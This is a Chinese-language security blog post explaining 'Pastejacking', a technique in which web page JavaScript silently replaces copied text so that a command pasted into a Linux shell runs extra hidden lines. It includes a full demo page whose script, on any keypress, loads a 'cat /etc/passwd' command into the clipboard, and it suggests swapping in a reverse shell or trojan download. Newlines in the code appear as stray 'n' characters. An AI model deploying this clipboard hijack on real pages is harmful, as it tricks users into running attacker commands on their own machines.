標籤:

專治複製粘貼癌症患者的Pastejacking

在linux bash下進行操作時難免因為懶,直接從別人的技術文章中複製相關的命令在bash下直接執行,為了治癒這種懶癌,應運而生的一種技術Pastejacking。原理很簡單,通過js代碼覆蓋某人的剪貼板中的內容達到欺騙眼睛的效果。操作流程如下:

訪問指定網頁,選擇相關內容,右鍵複製文字echo "not eval"。結果在記事本中粘貼出來的卻是echo "not eval" ncat /etc/passwdnecho "eval"。如果懶癌患者直接粘貼相關的文字命令在bash中執行,由於加入了換行符,使得命令「自動執行」,發現時已經無力回天了。

如果吧cat /etc/passwd可以替換為反彈shell或者下載木馬的腳本,就能實現一些意想不到的效果了。

關鍵代碼:

DOME:

<html>n <body>n 複製如下內容到bash命令行下執行.n </br>n <p>echo "not evil"</p>n <script>n function copyTextToClipboard(text) {n var textArea = document.createElement("textarea");n textArea.style.position = fixed;n textArea.style.top = 0;n textArea.style.left = 0;n textArea.style.width = 2em;n textArea.style.height = 2em;n textArea.style.padding = 0;n // Clean up any borders.n textArea.style.border = none;n textArea.style.outline = none;n textArea.style.boxShadow = none;n // Avoid flash of white box if rendered for any reason.n textArea.style.background = transparent;n textArea.value = text;n document.body.appendChild(textArea);n textArea.select();n try {n var successful = document.execCommand(copy);n var msg = successful ? successful : unsuccessful;n console.log(Copying text command was + msg);n } catch (err) {n console.log(Oops, unable to copy);n }n document.body.removeChild(textArea);n }n document.addEventListener(keydown, function(event) {n var ms = 800; n var start = new Date().getTime();n var end = start;n while(end < start + ms) {n end = new Date().getTime();n } n copyTextToClipboard(echo "not evil" ncat /etc/passwdn echo "evil" );n });n </script>n </body>n</html>n

本文為 echo 原創稿件,授權嘶吼獨家發布,未經許可禁止轉載,如若轉載,請聯繫嘶吼編輯: 4hou.com/web/8005.html 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀:

Hacker,沒有堅持3個月以上,就沒有發言權
訴訟聲明:這42款迪士尼應用程序正在監視你的孩子!
Microsoft圖標顯示錯誤,攻擊者可任意隱藏惡意PE文件

TAG:信息安全 |